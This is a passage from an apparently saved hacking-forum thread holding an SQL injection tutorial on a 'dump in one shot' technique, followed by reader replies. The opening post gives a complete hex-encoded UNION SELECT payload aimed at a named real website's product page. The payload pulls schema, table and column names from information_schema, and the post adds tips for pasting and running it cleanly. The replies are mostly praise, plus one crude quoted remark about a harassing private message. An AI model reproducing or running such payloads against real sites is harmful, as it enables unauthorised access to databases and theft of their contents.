​2d2d3e,column_name))))x))</code></div></div><br>So use that code instead of <span style="font-weight: bold;"><span style="color: #00BFFF;">C</span></span> part of our concat command:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>concat<br>&nbsp;&nbsp;(<br>&nbsp;&nbsp;&nbsp;&nbsp;&lt;/TITLE&gt;,version(), :: ajkaro (or your name),<br>&nbsp;&nbsp;&nbsp;&nbsp;&lt;BR&gt;,number of columns starting with id_ is, count(*),<br>&nbsp;&nbsp;&nbsp;&nbsp;dump_in_one_shot_syntax, &lt;TITLE&gt;<br>&nbsp;&nbsp;)</code></div></div><br><span style="font-weight: bold;"><span style="color: #FFD700;">The final code will be:</span></span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>www.lesplastiquesdelouest.com/produit.php?id=55
 and 0 UNION %0aSELECT 
1,2,3,concat(0x3c2f7469746c653e,version(),0x203a3a20616a6b61726f, 
0x3c42523e,0x6e756d626572206f6620636f6c756d6e73207374617274696e67207769746820696
​45f2069733a20,count(*), 
(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where
​
(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and((column_name)like(0x69
​
645f25))and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2d2d3e,table_name,0x
​
2d2d3e,column_name))))x),0x3c7469746c653e),5,6,7,8,9,10,11,12,13,14,15,16,17,18,
​19,20,21,22,23 
from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f73
​6368656d61)and(column_name)like(0x69645f25)--</code></div></div><br>This time we see all 32 column names starting with <span style="color: #32CD32;">id_</span> so challenge is solved for sure. <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/pirate.gif" style="vertical-align: middle;" alt="Pirate" title="Pirate" border="0"><br><br>Thanks for reading <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"> You can find part <span style="color: #32CD32;">#2</span> <a href="http://www.hackforums.net/showthread.php?tid=3532481" target="_blank"><span style="text-decoration: underline;">here</span></a><br><br><span style="color: #FF0000;"><span style="font-weight: bold;">WARNING</span></span><br>I hope you know about famous HF copy/paste problem with hidden characters. So my advice is: <span style="color: #FFD700;">open
 source of web page (click with right mouse button on page and select 
option View Page Source), locate command there and copy it from there. </span>In source code window those bug characters are visible in red color (see red rectangle on picture bellow).<br><img title="" src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/1830dd08be981434974ae6a6ed35e4a4.jpg" alt="[Image: 1830dd08be981434974ae6a6ed35e4a4.jpg]" border="0"><br><span style="color: #32CD32;"><span style="font-weight: bold;">Delete them before running the command.</span></span></div><div class="post_meta" id="post_meta_32700142"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3487536&amp;replyto=32700142" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid32702565" id="pid32702565"></a><table class="tborder" style="margin-top: 5px; " id="post_32702565" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">05-18-2013, 05:41 AM <span id="edited_by_32702565"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3487536&amp;pid=32702565#pid32702565">#2</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=475367"><span class="group2">denjacker</span></a></span></strong> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Mentat<br><span class="userstars"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 22<br>Posts: 313<br>Joined: Sep 2010<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=475367"><strong class="reputation_positive">44</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_32702565">You've made an incredible tutorial bro. Everything is clear, easy to read and understand . Keep up the good work!<br>... and thanks for the credits :p</div><div class="post_meta" id="post_meta_32702565"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=475367" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3487536&amp;replyto=32702565" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid32702746" id="pid32702746"></a><table class="tborder" style="margin-top: 5px; " id="post_32702746" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">05-18-2013, 05:54 AM <span id="edited_by_32702746"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3487536&amp;pid=32702746#pid32702746">#3</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img title="" src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 138<br>Posts: 2,183<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">222</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_32702746"><blockquote><cite><span>(05-18-2013 05:41 AM)</span>denjacker Wrote: <a href="http://www.hackforums.net/showthread.php?pid=32702565#pid32702565" class="quick_jump">►</a></cite>You've made an incredible tutorial bro. Everything is clear, easy to read and understand . Keep up the good work!<br>... and thanks for the credits :p</blockquote><br>Thanks my friend for kind words. You deserve the credits <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"></div><div class="post_meta" id="post_meta_32702746"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3487536&amp;replyto=32702746" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid32722870" id="pid32722870"></a><table class="tborder" style="margin-top: 5px; " id="post_32722870" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">05-19-2013, 01:58 AM <span id="edited_by_32722870"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3487536&amp;pid=32722870#pid32722870">#4</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1524483"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/cardiac_heart.gif" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1524483"><span class="group9">Thangorn</span></a></span></strong> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Approved for Ub3r<br><span class="userstars"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starl33t.png" alt="*" border="0"><br></span><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/hf_l33t.png" alt="HF l33t" title="HF l33t"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 34<br>Posts: 856<br>Joined: Oct 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1524483"><strong class="reputation_positive">107</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_32722870">Excellent guide! Very well explained and I definitely found this useful! Thanks for this!</div><div class="post_meta" id="post_meta_32722870"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1524483" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3487536&amp;replyto=32722870" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid32725104" id="pid32725104"></a><table class="tborder" style="margin-top: 5px; " id="post_32725104" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">05-19-2013, 05:04 AM <span id="edited_by_32725104"><span class="smalltext">(This post was last modified: 05-19-2013 10:49 AM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1241186">hackforumspang</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3487536&amp;pid=32725104#pid32725104">#5</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1241186"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/0fa0f9ce54eb150d907f3e0e35a039cf.png" alt="" height="80" width="80"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1241186"><span class="group2">hackforumspang</span></a></span></strong> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Sardaukar<br><span class="userstars"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 61<br>Posts: 1,897<br>Joined: Apr 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1241186"><strong class="reputation_positive">121</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_32725104">Good show. Although it's mostly general SQL knowledge, and not really things you need for injections.<br>I knew about these methods, just couldn't be bothered conjuring up a long syntax <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"><br>Thanks for sharing <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/yeye.gif" style="vertical-align: middle;" alt="Yeye" title="Yeye" border="0"><br><br>edit:<br><blockquote><cite>Quote:</cite>P.S.<br>If
 you don't have anything to say to me then don't send me such PM as you 
sent it. Your penis is not interesting to me. If you are interested in 
SQLi stick with SQLi. Your sick PM is not interesting or funny for me. 
How old are you? Grow up...</blockquote><br>LOL! No idea what whatever half of this is about, but I laughed so fucking hard.<br>They're after you for producing such HQ <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/pirate.gif" style="vertical-align: middle;" alt="Pirate" title="Pirate" border="0"><br>Grab the chastity belts.</div><div class="post_meta" id="post_meta_32725104"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1241186" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3487536&amp;replyto=32725104" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid32725871" id="pid32725871"></a><table class="tborder" style="margin-top: 5px; " id="post_32725871" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">05-19-2013, 05:50 AM <span id="edited_by_32725871"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3487536&amp;pid=32725871#pid32725871">#6</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1800101"><span style="color:#383838">backmark</span></a></span></strong> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Closed Account<br><span class="userstars"></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 1<br>Posts: 24<br>Joined: May 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1800101"><strong class="reputation_positive">6</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_32725871">where​(table_schema!=information_schema)and((column_name)like(id_)<br>^<br>that means select where table schema is not equal to information_schema and where column name starts with id_ correct?</div><div class="post_meta" id="post_meta_32725871"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1800101" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3487536&amp;replyto=32725871" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid32726054" id="pid32726054"></a><table class="tborder" style="margin-top: 5px; " id="post_32726054" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">05-19-2013, 06:03 AM <span id="edited_by_32726054"><span class="smalltext">(This post was last modified: 05-19-2013 06:07 AM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543">ajkaro</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3487536&amp;pid=32726054#pid32726054">#7</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 138<br>Posts: 2,183<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">222</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_32726054"><blockquote><cite><span>(05-19-2013 05:50 AM)</span>backmark Wrote: <a href="http://www.hackforums.net/showthread.php?pid=32725871#pid32725871" class="quick_jump">►</a></cite>where​(table_schema!=information_schema)and((column_name)like(id_)<br>^<br>that means select where table schema is not equal to information_schema and where column name starts with id_ correct?</blockquote><br>yep, but <span style="color: #32CD32;">% </span>is missing after id_<br><br><span style="color: #FFD700;">id_</span><span style="color: #32CD32;">%</span><br><br>P.S.<br>If
 you don't have anything to say to me then don't send me such PM as you 
sent it. Your penis is not interesting to me. If you are interested in 
SQLi stick with SQLi. Your sick PM is not interesting or funny for me. 
How old are you? Grow up...</div><div class="post_meta" id="post_meta_32726054"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3487536&amp;replyto=32726054" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid32726198" id="pid32726198"></a><table class="tborder" style="margin-top: 5px; " id="post_32726198" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">05-19-2013, 06:12 AM <span id="edited_by_32726198"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3487536&amp;pid=32726198#pid32726198">#8</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1544895"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/7379XT5.png" alt="" height="97" width="97"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1544895"><span style="color:#383838">zeru</span></a></span></strong> <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1544895" title="Away"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/buddy_away.gif" alt="Away" border="0"></a><br><span class="smalltext">Closed Account<br><span class="userstars"></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 36<br>Posts: 975<br>Joined: Nov 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1544895"><strong class="reputation_negative">-21</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_32726198">Thanks ajkaro, was scratching my head for a long time on this :)</div><div class="post_meta" id="post_meta_32726198"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://saladandchips.com/" target="_blank" class="bitButton" rel="nofollow" title="Visit this user's website">WWW</a> <a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1544895" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3487536&amp;replyto=32726198" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid32774936" id="pid32774936"></a><table class="tborder" style="margin-top: 5px; " id="post_32774936" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">05-21-2013, 01:30 PM <span id="edited_by_32774936"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3487536&amp;pid=32774936#pid32774936">#9</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 138<br>Posts: 2,183<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">222</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_32774936"><blockquote><cite><span>(05-19-2013 01:58 AM)</span>Thangorn Wrote: <a href="http://www.hackforums.net/showthread.php?pid=32722870#pid32722870" class="quick_jump">►</a></cite>Excellent guide! Very well explained and I definitely found this useful! Thanks for this!</blockquote><br><blockquote><cite><span>(05-19-2013 05:04 AM)</span>hackforumspang Wrote: <a href="http://www.hackforums.net/showthread.php?pid=32725104#pid32725104" class="quick_jump">►</a></cite>Good show. Although it's mostly 